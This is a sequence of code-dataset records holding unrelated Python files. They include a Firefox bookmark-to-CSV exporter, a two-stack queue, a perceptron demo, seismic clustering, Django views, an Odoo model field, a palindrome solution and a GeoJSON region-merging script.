moz_bookmarks.title != '(NULL)'\")\n getparent = conn.execute(\"SELECT id, title, parent, dateAdded, lastModified FROM moz_bookmarks WHERE type = 2\")\n for item in getparent:\n db[item[0]] = item[1]\n getparent = conn.execute(\"SELECT id, title, parent, dateAdded, lastModified FROM moz_bookmarks WHERE type = 2 AND parent!=4\")\n for item in getparent:\n parentid = item[2]\n #print(item[1])\n #print(parentid)\n parent = \"\"\n #print(parentid)\n try:\n parent = db[parentid]\n except KeyError:\n parent = \"\"\n #print(parent)\n destination.write(parent+\",\"+str(parentid)+\",\"+\"folder,\"+item[1]+\",\"+str(item[0])+\",\"+str(item[3])+\",\"+str(item[4])+\",NA\")\n destination.write(\"\\n\")\n line = \"\"\n for row in cursor:\n line = \"\"\n parentid = row[0]\n parent = db[parentid]\n #print(parent)\n if(parent!=\"\"):\n line = line + parent+\",\"+str(parentid)+\",\"+\"url,\"\n else:\n line = line + \" \"+\",\"+str(parentid)+\",url,\"\n #print(row)\n destination.write(line)\n for entry in row[2:6]:\n output = \"\"\n if isinstance(entry, str):\n entry = entry.replace(\",\",\" \")\n try:\n output = str(entry)\n destination.write(output+\",\")\n except UnicodeEncodeError:\n output = unicodedata.normalize('NFD', line).encode('ascii', 'ignore')\n output = output.decode('ascii')\n destination.write(output)\n destination.write(\",\")\n destination.write(row[6])\n destination.write(\"\\n\")\n \n destination.close()\n 
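    # Added note: the CSV handle was closed above; the next call releases the SQLite connection opened at the top of fromsql().\n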
    conn.close()\n\nfromsql(\"places.sqlite\")\n","sub_path":"Bookmarks.py","file_name":"Bookmarks.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"40151454","text":"# -*- coding: utf-8 -*-\n\"\"\"\n    A queue built from two stacks\n    ~~~~~~~~~~~~~~~~\n    Problem: implement a queue using two stacks.\n    Implement its two functions, append_tail and delete_head,\n    which insert a node at the tail of the queue and remove a node\n    from the head of the queue, respectively.\n\"\"\"\n\n\nclass MyQueue:\n    def __init__(self):\n        self.stack1 = []\n        self.stack2 = []\n\n    def append_tail(self, x):\n        self.stack1.append(x)\n\n    def delete_head(self):\n        if len(self.stack2) == 0:\n            while self.stack1:\n                self.stack2.append(self.stack1.pop())\n\n        head = self.stack2.pop()\n        return head\n\n\nif __name__ == '__main__':\n    queue = MyQueue()\n    queue.append_tail(1)\n    queue.append_tail(2)\n    queue.append_tail(3)\n    a = queue.delete_head()\n    b = queue.delete_head()\n    queue.append_tail(4)\n    c = queue.delete_head()\n    d = queue.delete_head()\n    print(a, b, c, d)\n","sub_path":"src/problems/p23_two_stack_build_queue.py","file_name":"p23_two_stack_build_queue.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"88973866","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport copy\r\n\r\n# class holding the training data set\r\nclass Data():\r\n    def __init__(self,data_input,data_output):\r\n        self.data_input = data_input\r\n        self.data_output = data_output\r\n\r\n    def is_positive(self,f): # return all values in list f that are greater than 0\r\n        selected_points = []\r\n        for i in range(0,row):\r\n            if f[i]>0: # the point is correctly classified\r\n                selected_points.append(f[i]) # store the correctly classified point\r\n        return selected_points\r\n\r\n    def train(self):\r\n        flag1 = True\r\n\r\n        # initial values of w, b and the learning rate\r\n        w = np.zeros(column)\r\n        w1=[]\r\n        b = 0\r\n        learning = 1\r\n        selected_points=[] # f after filtering\r\n\r\n        while flag1==True: # outer loop: exit once no point in the training set is misclassified\r\n            model = [np.dot(w, data_input[0]) + b, np.dot(w, data_input[1]) + b, np.dot(w, data_input[2]) + b]\r\n            f = [data_output[0] * model[0], data_output[1] * model[1], data_output[2] * model[2]] # elementwise product A*B\r\n            selected_points = self.is_positive(f)\r\n            if len(selected_points) == row : # exit condition: every point is correctly classified\r\n                flag1 = False\r\n            else:\r\n                selected_points = []\r\n\r\n                for i in range(0, row): # update w and b; inner loop from x1 to x3, keeping w, b after each pass\r\n                    flag2 = True\r\n                    while flag2:\r\n                        m = data_input[i]\r\n                        f = np.dot(w, data_input[i]) + b\r\n                        if data_output[i]*f <= 0:\r\n                            w += learning * data_output[i] * data_input[i]\r\n                            b += learning * data_output[i]\r\n                            w=copy.deepcopy(w) # deep copy so the stored w values are snapshots\r\n\r\n\r\n                            w1.append(w)\r\n                        else:\r\n                            flag2 = False\r\n\r\n        return w,b,w1\r\n\r\n\r\nif __name__ == '__main__':\r\n    # define inputs and outputs\r\n\r\n    data_input = np.array([[3,3],[4,3],[1,1]]) # define the input; note this creates a 3x2 array\r\n    data_output = [1,1,-1] # define the output\r\n    data = Data(data_input,data_output)\r\n    row,column = np.shape(data.data_input) # number of rows and columns; a.shape = [rows, columns]\r\n\r\n\r\n    w,b,w1 = data.train() # run the algorithm\r\n\r\n# plotting\r\n\r\n    plt.figure(figsize=(10, 5))\r\n    x_values = [3, 4, 1]\r\n    y_values = [3, 3, 1]\r\n    plt.scatter(x_values, y_values, s=100) # plot the training points\r\n\r\n    for w3 in w1:\r\n        print(w3)\r\n        w0=w3[0]\r\n        w1_val=w3[1]\r\n\r\n        if w1_val != 0:\r\n            x=np.linspace(0,6,10)\r\n            y=(-b-w0*x)/w1_val\r\n\r\n            plt.plot(x,y) # plot the separating line\r\n\r\n    plt.rcParams['font.sans-serif']=['SimHei']\r\n    plt.rcParams['axes.unicode_minus']=False # font settings kept from the original Chinese version\r\n    plt.title('Primal form of the perceptron learning algorithm')\r\n\r\n    plt.show()\r\n","sub_path":"pereptron.py","file_name":"pereptron.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"202193931","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\nimport sklearn\nfrom skimage.io import imread\n\nimport data_processing\nimport cluster_analysis\nimport k_means\nimport dbscan\nimport gaussian\n \ndef plot_cartesian_coordinates(x, y, z):\n \"\"\"Plot Cartesian coordinates of seismic events\"\"\"\n \n plt.figure(figsize=(10, 10))\n ax = plt.axes(projection='3d')\n ax.set_title('Cartesian coordinates of Seismic Events', {'fontsize':14, 'fontweight':'bold'})\n ax.scatter3D(x, y, z, '.', s=10, c='green')\n plt.savefig('Seismic_events_cartesian_coordinates.png', bbox_inches='tight');\n\ndef plot_classes(plot_name, labels, longitude, latitude, alpha=0.5, edge='k'):\n \"\"\"Plot seismic events using Mollweide projection.\n Arguments are the cluster labels and the longitude and latitude\n vectors of the events\"\"\"\n \n img = imread(\"Mollweide_projection_SW.jpg\") \n plt.figure(figsize=(10,5),frameon=False) \n x = longitude/180*np.pi\n y = latitude/180*np.pi\n ax = plt.subplot(111, projection=\"mollweide\")\n t = ax.transData.transform(np.vstack((x,y)).T)\n clims = np.array([(-np.pi,0),(np.pi,0),(0,-np.pi/2),(0,np.pi/2)])\n lims = ax.transData.transform(clims)\n plt.close()\n fig = plt.figure(figsize=(10,5),frameon=False) \n plt.subplot(111)\n plt.imshow(img,zorder=0,extent=[lims[0,0],lims[1,0],lims[2,1],lims[3,1]],aspect=1) \n x = t[:,0]\n y= t[:,1]\n nots = np.zeros(len(labels)).astype(bool)\n diffs = np.unique(labels) \n ix = 0 \n for lab in diffs[diffs>=0]: \n mask = labels==lab\n nots = np.logical_or(nots,mask) \n plt.plot(x[mask], y[mask],'o', markersize=4, mew=1,zorder=1,alpha=alpha, markeredgecolor=edge)\n ix = ix+1 \n mask = np.logical_not(nots) \n if np.sum(mask)>0:\n plt.plot(x[mask], y[mask], '.', markersize=1, mew=1,markerfacecolor='w', markeredgecolor=edge)\n plt.axis('off')\n plt.title(plot_name)\n fig.savefig(plot_name)\n\ndef kmeans_performance(X, labels_true, longitude, latitude, max_cluster):\n kmeans_eval = k_means.kmeans_tuning(X, max_cluster, labels_true, 205)\n k_means.plot_cluster(max_cluster, kmeans_eval)\n\n index_name = ['Precision', 'Recall', 'F1-Score', 'Rand Index', 'Adjusted Rand Index', 'Silhouette']\n for i in range(0, len(index_name)):\n best_k = kmeans_eval[:,i].argmax() + 2\n best_kmeans_model = sklearn.cluster.KMeans(best_k, random_state=205)\n best_kmeans_model.fit(X)\n labels_pred = best_kmeans_model.labels_\n best_kmeans_eval = cluster_analysis.evaluate_cluster(X, labels_true, labels_pred)\n print('\\nMaximising ' + index_name[i])\n print('Number of clusters: %d' % best_k)\n print(\"Precision: %0.3f\" % best_kmeans_eval[0])\n print(\"Recall: %0.3f\" % best_kmeans_eval[1])\n print(\"F1: %0.3f\" % best_kmeans_eval[2])\n print(\"Rand Index: %0.3f\" % best_kmeans_eval[3])\n print(\"Adjusted Rand Index: %0.3f\" % best_kmeans_eval[4])\n print(\"Silhouette: %0.3f\" % best_kmeans_eval[5])\n\ndef dbscan_performance(X, labels_true, longitude, latitude, epsilon, delta, pace= 1):\n #Calculate k_distances\n k_dist = dbscan.k_distance(X)\n dbscan.plot_k_distance(k_dist)\n #We set epsilon to the distance we have at point 500\n min_eps = max(10, epsilon-delta)\n max_eps = min(k_dist.max(), epsilon+delta)\n indices, n_clusters = dbscan.dbscan_tuning(X, labels_true, min_eps, max_eps, pace)\n dbscan.plot_indices(indices, min_eps, max_eps, pace)\n dbscan.plot_cluster(n_clusters, min_eps, max_eps, pace)\n eps_paper = k_dist[500]\n dbscan_model = sklearn.cluster.DBSCAN(eps_paper, 4, n_jobs=-1)\n 
dbscan_model.fit(X)\n pred_labels = dbscan_model.labels_\n \n dbscan_eval_paper = cluster_analysis.evaluate_cluster(X, labels_true, pred_labels)\n n_clusters_ = len(set(pred_labels)) - (1 if -1 in pred_labels else 0)\n print('Number of clusters: %d' % n_clusters_)\n print(\"Precision: %0.3f\" % dbscan_eval_paper[0])\n print(\"Recall: %0.3f\" % dbscan_eval_paper[1])\n print(\"F1: %0.3f\" % dbscan_eval_paper[2])\n print(\"Rand Index: %0.3f\" % dbscan_eval_paper[3])\n print(\"Adjusted Rand Index: %0.3f\" % dbscan_eval_paper[4])\n print(\"Silhouette: %0.3f\" % dbscan_eval_paper[5])\n plot_classes(\"DBSCAN\", pred_labels, longitude, latitude, alpha=0.5, edge='k')\n\ndef gmm_performance(X, labels_true, longitude, latitude, max_range):\n gmm_indices, gmm = gaussian.gmm_tuning(X, labels_true, max_range)\n gaussian.gmm_plot(gmm_indices, max_range)\n gmm.fit(X)\n labels_pred= gmm.predict(X)\n gmm_evaluate= cluster_analysis.evaluate_cluster(X, labels_true, labels_pred)\n n_clusters = gmm.n_components\n print('Number of components: %d' % n_clusters)\n print(\"Precision: %0.3f\" % gmm_evaluate[0])\n print(\"Recall: %0.3f\" % gmm_evaluate[1])\n print(\"F1: %0.3f\" % gmm_evaluate[2])\n print(\"Rand Index: %0.3f\" % gmm_evaluate[3])\n print(\"Adjusted Rand Index: %0.3f\" % gmm_evaluate[4])\n print(\"Silhouette: %0.3f\" % gmm_evaluate[5])\n plot_classes(\"GMM\", labels_pred, longitude, latitude, alpha=0.5, edge='k')\n\ndef main():\n # Get the data\n latitude, longitude, fault = data_processing.read_csv();\n x, y, z = data_processing.transform_coordinates(latitude, longitude);\n plot_cartesian_coordinates(x, y, z);\n X= data_processing.preprocess_data(x, y, z)\n \n plot_classes(\"Faults\", fault, longitude, latitude)\n \n # KMEANS\n max_cluster= 150\n kmeans_performance(X, fault, longitude, latitude, max_cluster)\n \n # DBSCAN\n epsilon = 300\n delta = 300\n dbscan_performance(X, fault, longitude, latitude, epsilon, delta)\n \n # GMM\n max_range = 200\n gmm_performance(X, fault, longitude, latitude, max_range)\n \nmain()","sub_path":"Test/tp2.py","file_name":"tp2.py","file_ext":"py","file_size_in_byte":5830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"161517153","text":"from django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.status import HTTP_201_CREATED, HTTP_400_BAD_REQUEST, HTTP_404_NOT_FOUND, \\\n HTTP_405_METHOD_NOT_ALLOWED\n\nfrom backend.models import Address, Tag\nfrom backend.serializers import AddressSerializer, TagSerializer\n\n\n@csrf_exempt\ndef address_list(request):\n \"\"\"\n List all addresses or create a new one.\n :param request:\n :return: list of addresses\n \"\"\"\n response = HttpResponse(status=HTTP_405_METHOD_NOT_ALLOWED)\n if request.method == \"GET\":\n response = __list_addresses()\n elif request.method == \"POST\":\n response = __create_address(request)\n return response\n\n\n@csrf_exempt\ndef address_tags(request, pk):\n \"\"\"\n Retrieve an address' tags\n :param request:\n :param pk:\n :return: details of tags\n \"\"\"\n try:\n address = Address.objects.get(pk=pk)\n except Address.DoesNotExist:\n return HttpResponse(status=HTTP_404_NOT_FOUND)\n\n response = HttpResponse(status=HTTP_405_METHOD_NOT_ALLOWED)\n if request.method == 'GET':\n response = __retrieve_tags_by_address(address)\n\n return response\n\n\ndef __list_addresses():\n addresses = Address.objects.all()\n serializer = 
AddressSerializer(addresses, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n\ndef __create_address(request):\n data = JSONParser().parse(request)\n serializer = AddressSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=HTTP_201_CREATED)\n return JsonResponse(serializer.errors, status=HTTP_400_BAD_REQUEST)\n\n\ndef __retrieve_tags_by_address(address):\n tags = Tag.objects.filter(address=address)\n serializer = TagSerializer(tags, many=True)\n return JsonResponse(serializer.data, safe=False)\n","sub_path":"backend/controllers/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"576775595","text":"# -*- coding: utf-8 -*-\n# © 2004-2011 Pexego Sistemas Informáticos. (http://pexego.es)\n# © 2012 NaN·Tic (http://www.nan-tic.com)\n# © 2013 Acysos (http://www.acysos.com)\n# © 2013 Joaquín Pedrosa Gutierrez (http://gutierrezweb.es)\n# © 2014-2015 Serv. Tecnol. Avanzados - Pedro M. Baeza\n# (http://www.serviciosbaeza.com)\n# © 2016 Antiun Ingenieria S.L. - Antonio Espinosa\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\n\nfrom odoo import fields, models, api\n\n\nclass ResPartner(models.Model):\n _inherit = \"res.partner\"\n\n not_in_mod347 = fields.Boolean(\n \"Not included in 347 report\",\n help=\"If you mark this field, this partner will not be included in \"\n \"any AEAT 347 model report, independently from the total \"\n \"amount of its operations.\", default=False)\n\n @api.model\n def _commercial_fields(self):\n res = super(ResPartner, self)._commercial_fields()\n res += ['not_in_mod347']\n return res\n","sub_path":"ascendia_mod347/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"610033003","text":"from google.cloud import vision\n\n\ndef localize_objects_uri(uri):\n client = vision.ImageAnnotatorClient()\n image = vision.types.Image()\n image.source.image_uri = uri\n objects = client.object_localization(\n image=image).localized_object_annotations\n return objects\n","sub_path":"vision/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"2765005","text":"def questionOne():\r\n inputF = open(\"four.txt\", 'r')\r\n outputF = open(\"solution4.txt\", 'w')\r\n\r\n for line in inputF:\r\n outputString = \"\"\r\n for i in line:\r\n if i.isupper():\r\n outputString = outputString + i\r\n else:\r\n pass\r\n outputF.write(outputString)\r\n\r\n inputF.close()\r\n outputF.close()\r\n\r\n\r\ndef questionTwo():\r\n inputF = open(\"four.txt\", 'r')\r\n\r\n numbers = '0123456789'\r\n\r\n finalNum3 = 0\r\n\r\n for fileLines in inputF:\r\n for text in fileLines:\r\n if text in numbers:\r\n # print(i)\r\n finalNum3 = finalNum3 + int(text)\r\n outputString = \"\"\r\n\r\n with open(\"four.txt\") as fp:\r\n for i, line in enumerate(fp):\r\n if i >= 10:\r\n\r\n for aLine in line:\r\n outputString = outputString + aLine.replace(\"|\", \" \")\r\n break\r\n\r\n counter = 0\r\n\r\n if \"|\" not in outputString:\r\n for i in outputString:\r\n counter = counter + 1\r\n if counter >= finalNum3:\r\n print(\"test\")\r\n print(i)\r\n break\r\n\r\n inputF.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 
questionOne()\r\n questionTwo()","sub_path":"four.py","file_name":"four.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"288565039","text":"import platform\nimport uuid\nfrom collections import defaultdict\nfrom typing import Any, ClassVar, Dict, List, MutableMapping, Optional\n\nimport pyrogram\nfrom pyrogram.errors import BotInlineDisabled, MessageDeleteForbidden\nfrom pyrogram.types import (\n CallbackQuery,\n InlineQuery,\n InlineKeyboardButton,\n InlineKeyboardMarkup,\n InlineQueryResultArticle,\n InputTextMessageContent\n)\n\nfrom .. import __version__, command, listener, module, util\n\n\nclass CoreModule(module.Module):\n name: ClassVar[str] = \"Core\"\n\n cache: Dict[int, int]\n db: util.db.AsyncCollection\n\n async def on_load(self):\n self.cache = {}\n self.db = self.bot.db.get_collection(\"core\")\n\n def build_button(self) -> List[List[InlineKeyboardButton]]:\n modules = list(self.bot.modules.keys())\n button: List[InlineKeyboardButton] = []\n for mod in modules:\n button.append(InlineKeyboardButton(\n mod, callback_data=f\"menu({mod})\".encode()))\n buttons = [\n button[i * 3:(i + 1) * 3]\n for i in range((len(button) + 3 - 1) // 3)\n ]\n buttons.append(\n [\n InlineKeyboardButton(\n \"✗ Close\",\n callback_data=\"menu(Close)\".encode()\n )\n ]\n )\n\n return buttons\n\n async def on_inline_query(self, query: InlineQuery) -> None:\n repo = self.bot.getConfig[\"github_repo\"]\n answer = [\n InlineQueryResultArticle(\n id=str(uuid.uuid4()),\n title=\"About Caligo\",\n input_message_content=InputTextMessageContent(\n \"__Caligo is SelfBot based on Pyrogram library.__\"),\n url=f\"https://github.com/{repo}\",\n description=\"A Selfbot Telegram.\",\n thumb_url=None,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n \"⚡️ Repo\",\n url=f\"https://github.com/{repo}\"),\n InlineKeyboardButton(\n \"📖️ How To\",\n url=f\"https://github.com/{repo}#Installation\"),\n ]\n ]\n )\n )\n ]\n if query.from_user and (query.from_user.id == self.bot.uid):\n button = await util.run_sync(self.build_button)\n answer.append(\n InlineQueryResultArticle(\n id=str(uuid.uuid4()),\n title=\"Menu\",\n input_message_content=InputTextMessageContent(\n \"**Caligo Menu Helper**\"),\n url=f\"https://github.com/{repo}\",\n description=\"Menu Helper.\",\n thumb_url=None,\n reply_markup=InlineKeyboardMarkup(button)\n )\n )\n\n await query.answer(results=answer, cache_time=3)\n return\n\n @listener.pattern(r\"menu\\((\\w+)\\)$\")\n async def on_callback_query(self, query: CallbackQuery) -> None:\n if query.from_user and query.from_user.id != self.bot.uid:\n await query.answer(\"Sorry, you don't have permission to access.\",\n show_alert=True)\n return\n\n mod = query.matches[0].group(1)\n if mod == \"Back\":\n button = await util.run_sync(self.build_button)\n await query.edit_message_text(\n \"**Caligo Menu Helper**\",\n reply_markup=InlineKeyboardMarkup(button))\n return\n if mod == \"Close\":\n button = await util.run_sync(self.build_button)\n for msg_id, chat_id in list(self.cache.items()):\n try:\n await self.bot.client.delete_messages(chat_id, msg_id)\n except Exception: # skipcq: PYL-W0703\n break\n else:\n break\n finally:\n del self.cache[msg_id]\n else:\n await query.answer(\"😿️ Couldn't close message\")\n await query.edit_message_text(\n \"**Caligo Menu Helper**\",\n reply_markup=InlineKeyboardMarkup(button[:-1]))\n\n return\n\n modules: MutableMapping[str, MutableMapping[str, str]] = 
defaultdict(dict)\n for _, cmd in self.bot.commands.items():\n if cmd.module.name != mod:\n continue\n\n desc = cmd.desc if cmd.desc else \"__No description provided__\"\n aliases = \"\"\n if cmd.aliases:\n aliases = f' (aliases: {\", \".join(cmd.aliases)})'\n\n mod_name = type(cmd.module).name\n modules[mod_name][cmd.name] = desc + aliases\n\n response = None\n for mod_name, commands in sorted(modules.items()):\n response = util.text.join_map(commands, heading=mod_name)\n\n if response is not None:\n button = [[InlineKeyboardButton(\n \"⇠ Back\", callback_data=\"menu(Back)\".encode()\n )]]\n await query.edit_message_text(\n response, reply_markup=InlineKeyboardMarkup(button))\n\n return\n\n await query.answer(f\"😿️ {mod} doesn't have any commands.\")\n return\n\n @command.desc(\"List the commands\")\n @command.usage(\"[filter: command or module name?]\", optional=True)\n async def cmd_help(self, ctx: command.Context) -> Optional[str]:\n if self.bot.has_bot and not ctx.input:\n response: Any\n try:\n response = await self.bot.client.get_inline_bot_results(\n self.bot.bot_user.username)\n except BotInlineDisabled:\n return \"__Bot Inline Disabled__\"\n else:\n await ctx.msg.delete()\n \n res: Any = await self.bot.client.send_inline_bot_result(\n ctx.msg.chat.id, response.query_id, response.results[1].id)\n self.cache[res.updates[0].id] = ctx.msg.chat.id\n\n return\n\n filt = ctx.input\n modules: MutableMapping[str, MutableMapping[str, str]] = defaultdict(dict)\n if filt and filt not in self.bot.modules:\n if filt in self.bot.commands:\n cmd = self.bot.commands[filt]\n\n aliases = f\"`{'`, `'.join(cmd.aliases)}`\" if cmd.aliases else \"none\"\n\n if cmd.usage is None:\n args_desc = \"none\"\n else:\n args_desc = cmd.usage\n\n if cmd.usage_optional:\n args_desc += \" (optional)\"\n if cmd.usage_reply:\n args_desc += \" (also accepts replies)\"\n\n return f\"\"\"`{cmd.name}`: **{cmd.desc if cmd.desc else '__No description provided.__'}**\n\nModule: {cmd.module.name}\nAliases: {aliases}\nExpected parameters: {args_desc}\"\"\"\n\n return \"__That filter didn't match any commands or modules.__\"\n\n for name, cmd in self.bot.commands.items():\n if filt:\n if cmd.module.name != filt:\n continue\n else:\n if name != cmd.name:\n continue\n\n desc = cmd.desc if cmd.desc else \"__No description provided__\"\n aliases = \"\"\n if cmd.aliases:\n aliases = f' (aliases: {\", \".join(cmd.aliases)})'\n\n mod_name = type(cmd.module).name\n modules[mod_name][cmd.name] = desc + aliases\n\n response = None\n for mod_name, commands in sorted(modules.items()):\n section = util.text.join_map(commands, heading=mod_name)\n add_len = len(section) + 2\n if response and (len(response) + add_len > util.tg.MESSAGE_CHAR_LIMIT):\n await ctx.respond_multi(response)\n response = None\n\n if response:\n response += \"\\n\\n\" + section\n else:\n response = section\n\n if response:\n await ctx.respond_multi(response)\n\n @command.desc(\"Get or change this bot prefix\")\n @command.alias(\"setprefix\", \"getprefix\")\n @command.usage(\"[new prefix?]\", optional=True)\n async def cmd_prefix(self, ctx: command.Context) -> str:\n new_prefix = ctx.input\n\n if not new_prefix:\n return f\"The prefix is `{self.bot.prefix}`\"\n\n self.bot.prefix = new_prefix\n await self.db.find_one_and_update(\n {\"_id\": self.name},\n {\n \"$set\": {\"prefix\": new_prefix}\n }\n )\n\n return f\"Prefix set to `{self.bot.prefix}`\"\n\n @command.desc(\"Get information about this bot instance\")\n @command.alias(\"botinfo\")\n async def cmd_info(self, 
ctx: command.Context) -> None:\n # Get tagged version and optionally the Git commit\n commit = await util.run_sync(util.version.get_commit)\n dirty = \", dirty\" if await util.run_sync(util.git.is_dirty) else \"\"\n unofficial = (\n \", unofficial\" if not await util.run_sync(util.git.is_official) else \"\"\n )\n version = (\n f\"{__version__} ({commit}{dirty}{unofficial})\"\n if commit\n else __version__\n )\n\n # Clean system version\n sys_ver = platform.release()\n try:\n sys_ver = sys_ver[: sys_ver.index(\"-\")]\n except ValueError:\n pass\n\n # Get current uptime\n now = util.time.usec()\n uptime = util.time.format_duration_us(now - self.bot.start_time_us)\n\n # Get total uptime from stats module (if loaded)\n stats_module = self.bot.modules.get(\"Stats\", None)\n get_start_time = getattr(stats_module, \"get_start_time\", None)\n total_uptime = None\n if stats_module is not None and callable(get_start_time):\n stats_start_time = await get_start_time()\n total_uptime = util.time.format_duration_us(now - stats_start_time) + \"\\n\"\n else:\n uptime += \"\\n\"\n\n # Get total number of chats, including PMs\n num_chats = await self.bot.client.get_dialogs_count()\n\n response = util.text.join_map(\n {\n \"Version\": version,\n \"Python\": f\"{platform.python_implementation()} {platform.python_version()}\",\n \"Pyrogram\": f\"{pyrogram.__version__}\",\n \"System\": f\"{platform.system()} {sys_ver}\",\n \"Uptime\": uptime,\n **({\"Total uptime\": total_uptime} if total_uptime else {}),\n \"Commands loaded\": len(self.bot.commands),\n \"Modules loaded\": len(self.bot.modules),\n \"Listeners loaded\": sum(\n len(evt) for evt in self.bot.listeners.values()\n ),\n \"Events activated\": f\"{self.bot.events_activated}\\n\",\n \"Chats\": num_chats,\n },\n heading='Caligo info',\n parse_mode=\"html\",\n )\n\n # HTML allows us to send a bolded link (nested entities)\n await ctx.respond(response, parse_mode=\"html\")\n","sub_path":"caligo/modules/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":11337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"289796488","text":"'''\nGiven a string which consists of lowercase or uppercase letters, find the length of the longest palindromes that can be built with those letters.\n\nThis is case sensitive, for example \"Aa\" is not considered a palindrome here.\n\nNote:\nAssume the length of given string will not exceed 1,010.\n\nExample:\n\nInput:\n\"abccccdd\"\n\nOutput:\n7\n\nExplanation:\nOne longest palindrome that can be built is \"dccaccd\", whose length is 7.\n'''\nclass Solution(object):\n def longestPalindrome(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if s is None:\n return 0\n mapping = {}\n for i in range(len(s)):\n if s[i] not in mapping:\n mapping[s[i]] = 1\n else:\n mapping[s[i]] += 1\n max_odd = 0\n cnt = 0\n indicator = False\n for key in mapping:\n if mapping[key] %2 == 0:\n cnt += mapping[key]\n else:\n indicator = True\n cnt += mapping[key] - 1\n if indicator == True:\n cnt += 1\n return cnt\n","sub_path":"palindrome/longest_palindrome.py","file_name":"longest_palindrome.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"351215735","text":"import os\nimport json\nimport pandas as pd\n\nprint('load TL_SCCO_CTPRVN.json...')\nf = open(os.path.join('GeoJSON', 'TL_SCCO_CTPRVN.json'), 'rt')\nCTRPVN = json.load(f)\nf.close()\n\nprint('load TL_SCCO_SIG.json...')\nf = 
open(os.path.join('GeoJSON', 'TL_SCCO_SIG.json'), 'rt')\nSIG = json.load(f)\nf.close()\n\nprint('load TL_SCCO_EMD.json...')\nf = open(os.path.join('GeoJSON', 'TL_SCCO_EMD.json'), 'rt')\nEMD = json.load(f)\nf.close()\n\ndatas = {\n 'CTPRVN_CD': [],\n 'CTPRVN_ENG_NM': [],\n 'CTPRVN_KOR_NM': [],\n 'SIG_CD': [],\n 'SIG_ENG_NM': [],\n 'SIG_KOR_NM': [],\n 'EMD_CD': [],\n 'EMD_ENG_NM': [],\n 'EMD_KOR_NM': [],\n 'geometry': [],\n}\n\ndf = pd.DataFrame(datas)\n\nprint('merge CTPRVN info...')\nfor elem in CTRPVN['features']:\n df = df.append({\n 'CTPRVN_CD': elem['properties']['CTPRVN_CD'],\n 'CTPRVN_ENG_NM': elem['properties']['CTP_ENG_NM'],\n 'CTPRVN_KOR_NM': elem['properties']['CTP_KOR_NM'],\n 'SIG_CD': None,\n 'SIG_ENG_NM': None,\n 'SIG_KOR_NM': None,\n 'EMD_CD': None,\n 'EMD_ENG_NM': None,\n 'EMD_KOR_NM': None,\n 'geometry': json.dumps(elem['geometry']),\n }, ignore_index=True)\n\n\nprint('merge SIG info...')\nfor elem in SIG['features']:\n df = df.append({\n 'CTPRVN_CD': None,\n 'CTPRVN_ENG_NM': None,\n 'CTPRVN_KOR_NM': None,\n 'SIG_CD': elem['properties']['SIG_CD'],\n 'SIG_ENG_NM': elem['properties']['SIG_ENG_NM'],\n 'SIG_KOR_NM': elem['properties']['SIG_KOR_NM'],\n 'EMD_CD': None,\n 'EMD_ENG_NM': None,\n 'EMD_KOR_NM': None,\n 'geometry': json.dumps(elem['geometry']),\n }, ignore_index=True)\n\nprint('merge EMD info...')\nfor elem in EMD['features']:\n df = df.append({\n 'CTPRVN_CD': None,\n 'CTPRVN_ENG_NM': None,\n 'CTPRVN_KOR_NM': None,\n 'SIG_CD': None,\n 'SIG_ENG_NM': None,\n 'SIG_KOR_NM': None,\n 'EMD_CD': elem['properties']['EMD_CD'],\n 'EMD_ENG_NM': elem['properties']['EMD_ENG_NM'],\n 'EMD_KOR_NM': elem['properties']['EMD_KOR_NM'],\n 'geometry': json.dumps(elem['geometry']),\n }, ignore_index=True)\n\nprint('fill CTRPVN, SIG info...')\ndf.loc[df.SIG_CD.notnull(), 'CTPRVN_CD'] = df[df.SIG_CD.notnull()].SIG_CD.str[:2]\ndf.loc[df.EMD_CD.notnull(), 'CTPRVN_CD'] = df[df.EMD_CD.notnull()].EMD_CD.str[:2]\ndf.loc[df.EMD_CD.notnull(), 'SIG_CD'] = df[df.EMD_CD.notnull()].EMD_CD.str[:5]\n\nfor CTPRVN_CD in df.CTPRVN_CD.unique():\n df.loc[df.CTPRVN_CD == CTPRVN_CD, 'CTPRVN_ENG_NM'] = df.loc[df.CTPRVN_CD == CTPRVN_CD, 'CTPRVN_ENG_NM'].iloc[0]\n df.loc[df.CTPRVN_CD == CTPRVN_CD, 'CTPRVN_KOR_NM'] = df.loc[df.CTPRVN_CD == CTPRVN_CD, 'CTPRVN_KOR_NM'].iloc[0]\n\nfor SIG_CD in df.SIG_CD.dropna().unique():\n 